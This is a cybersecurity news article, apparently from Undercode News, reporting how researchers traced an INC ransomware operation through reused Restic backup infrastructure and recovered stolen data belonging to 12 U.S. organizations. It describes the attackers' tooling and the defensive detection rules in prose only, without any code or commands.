INC Ransomware, Researchers Recover Stolen Data After OpSec Failure

Listen to this Post

Featured Image

Introduction: When Attackers Leave the Door Open

Ransomware groups are often portrayed as disciplined, methodical, and operationally mature. Yet even well-established cybercriminal operations make mistakes. In a rare reversal of roles, an operational security lapse by the INC ransomware gang enabled researchers to uncover and recover data stolen from multiple U.S. organizations. What began as a routine ransomware investigation evolved into a broader exposure of attacker infrastructure—revealing how long-lived, reused tooling can quietly betray even experienced threat actors.

Incident Origin: A SQL Server Raises the Alarm

The investigation began after a U.S.-based organization detected ransomware encryption activity on a production SQL Server. Early indicators suggested a familiar intrusion pattern, but subtle artifacts hinted that this case might not be routine. Cyber Centaurs, a digital forensics and incident response firm, was brought in to analyze the breach and contain the damage.

Initial Payload Analysis: RainINC Makes an Appearance

Forensic analysis revealed that the ransomware payload was a RainINC variant, a known strain associated with the INC ransomware operation. The binary was executed from the PerfLogs directory—a legitimate Windows path increasingly abused by ransomware operators for staging malicious activity. This choice reflected a growing trend among attackers to hide in plain sight.

Suspicious Staging: Why PerfLogs Matters

The use of the PerfLogs directory immediately raised eyebrows. While the folder is normally created by Windows for performance monitoring, its misuse by threat actors has become more common. In this case, it provided a low-noise execution environment that delayed detection and blended malicious activity with system-level behavior.

Unexpected Artifacts: Restic Enters the Picture

During the investigation, analysts discovered artifacts linked to Restic, a legitimate open-source backup utility. Interestingly, Restic had not been actively used during this specific attack for data exfiltration. Instead, the traces suggested prior or parallel use in other operations, shifting the investigative focus from simple incident response to attacker infrastructure analysis.

A Turning Point: From Victim Response to Infrastructure Mapping

The presence of unused tooling marked a critical turning point. Rather than focusing solely on how the client was compromised, Cyber Centaurs began examining how INC ransomware managed its broader operational ecosystem. This shift opened the door to uncovering reused infrastructure across multiple campaigns.

Leftovers Tell Stories: Renamed Binaries and Scripts

Among the artifacts were renamed binaries such as winupdate.exe, PowerShell scripts designed to automate Restic operations, and hardcoded configuration values. These remnants painted a picture of a threat actor relying on repeatable, semi-automated workflows rather than bespoke tooling per victim.

PowerShell Clues: The new.ps1 Script

One PowerShell script, named new.ps1, became particularly significant. It contained Base64-encoded Restic commands along with hardcoded environment variables. These included access keys, repository paths, and S3 credentials used to manage encrypted backup repositories controlled by the attackers.

Hardcoded Secrets: A Risky Operational Choice

Hardcoding sensitive variables into scripts is a convenience for attackers—but also a liability. By embedding repository locations and credentials directly into reusable scripts, INC ransomware increased the likelihood that investigators could trace and access attacker-controlled storage infrastructure.

A Critical Hypothesis: Persistent Repositories

Cyber Centaurs theorized that INC ransomware reused Restic-based infrastructure across campaigns. If true, backup repositories would likely persist long after individual ransom negotiations ended. These repositories could quietly store encrypted data from multiple victims, becoming long-lived assets rather than disposable resources.

Testing the Theory: Controlled Enumeration

To validate this hypothesis, the researchers designed a controlled, non-destructive enumeration process. This method ensured no data was altered while confirming whether attacker repositories still contained exfiltrated victim data.

Confirmation: Data From 12 Organizations

The results were striking. The team confirmed the presence of encrypted data belonging to 12 unrelated U.S. organizations. These victims spanned healthcare, manufacturing, technology, and service sectors, underscoring the breadth of INC ransomware’s reach.

Independent Victims: No Overlap, No Coordination

None of the affected organizations were clients of Cyber Centaurs. The incidents were separate ransomware events with no direct connection beyond the shared attacker infrastructure. This reinforced the conclusion that INC reused tooling and storage across campaigns.

Decryption and Preservation: Handling Stolen Data

After confirming ownership with law enforcement guidance, Cyber Centaurs decrypted the recovered backups and preserved the data securely. The process was handled carefully to ensure legal compliance and proper chain-of-custody procedures.

Law Enforcement Coordination: Doing It by the Book

Rather than acting unilaterally, the researchers coordinated with authorities to validate data ownership and determine the appropriate next steps. This collaboration ensured that recovered data could be responsibly returned or managed without compromising investigations.

Tooling Breakdown: Inside INC’s Arsenal

The final report detailed multiple tools commonly used by INC ransomware. These included cleanup utilities, remote access software, and network scanning tools. Together, they form a flexible toolkit designed to support lateral movement, persistence, and data theft.

Defensive Measures: Turning Offense Into Detection

To help defenders, Cyber Centaurs released YARA and Sigma detection rules. These signatures are designed to identify Restic usage or renamed binaries operating from suspicious directories—early indicators of a ransomware attack in preparation.

INC Ransomware Background: A Growing Threat

INC ransomware operates as a ransomware-as-a-service (RaaS) platform and emerged in mid-2023. Since then, it has claimed a growing list of high-profile victims across public and private sectors worldwide.

Notable Victims: A Pattern of Impact

Organizations reportedly targeted by INC include Yamaha Motor, Xerox Business Solution, Scotland’s NHS, McLaren Health Care, the Texas State Bar, Ahold Delhaize, and multiple government agencies. The diversity of victims highlights the group’s broad targeting strategy.

What Undercode Say: Operational Sloppiness Is the New Weak Link

The INC ransomware case illustrates a critical shift in modern cybercrime: attackers increasingly rely on automation and infrastructure reuse to scale operations. While this improves efficiency, it also introduces systemic risk. Reused scripts, hardcoded credentials, and persistent storage create choke points investigators can exploit.

What Undercode Say: Legitimate Tools as Double-Edged Swords

The abuse of legitimate tools like Restic complicates detection but also leaves recognizable fingerprints. Backup utilities are not inherently suspicious, but their presence in unusual directories or with hardcoded credentials should raise immediate alarms for defenders.

What Undercode Say: Infrastructure Lives Longer Than Attacks

Ransomware incidents may be short-lived, but attacker infrastructure often persists. This case proves that exfiltrated data can remain recoverable long after ransom negotiations conclude, challenging assumptions about data permanence after breaches.

What Undercode Say: From Incident Response to Threat Hunting

Defenders should think beyond containment. Post-incident investigations can uncover attacker infrastructure that benefits a much wider victim pool. Threat hunting informed by forensic leftovers can deliver disproportionate defensive value.

What Undercode Say: Detection Over Decryption

While decrypting stolen data is rare, detecting ransomware in its staging phase is achievable. Sigma and YARA rules targeting misuse of backup tools represent a practical, scalable defense strategy.

What Undercode Say: RaaS Operations Are Fragile at Scale

Ransomware-as-a-service lowers the barrier to entry but also centralizes risk. Shared tooling and infrastructure mean one operational mistake can expose multiple campaigns at once.

What Undercode Say: Collaboration Changes Outcomes

The success of this recovery effort depended on cooperation between private researchers and law enforcement. This model demonstrates how responsible disclosure and coordination can turn attacker mistakes into tangible victim relief.

Fact Checker Results

✅ The recovery of encrypted data from 12 U.S. organizations is supported by forensic validation.
✅ Evidence confirms the reuse of Restic-based infrastructure across separate INC ransomware campaigns.
❌ There is no indication that all INC ransomware operations rely on identical tooling or repositories.

Prediction

🔮 Ransomware groups will increasingly rotate infrastructure to avoid similar exposures.
🔮 Defenders will expand detection logic around legitimate tools abused for exfiltration.
🔮 Infrastructure-focused investigations will become as important as malware analysis itself.

🕵️‍📝✔️Let’s dive deep and fact‑check.

References:

Reported By: www.bleepingcomputer.com
Extra Source Hub (Possible Sources for article):
https://www.quora.com
Wikipedia
OpenAi & Undercode AI

Image Source:

Unsplash
Undercode AI DI v2
Bing

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeNews & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon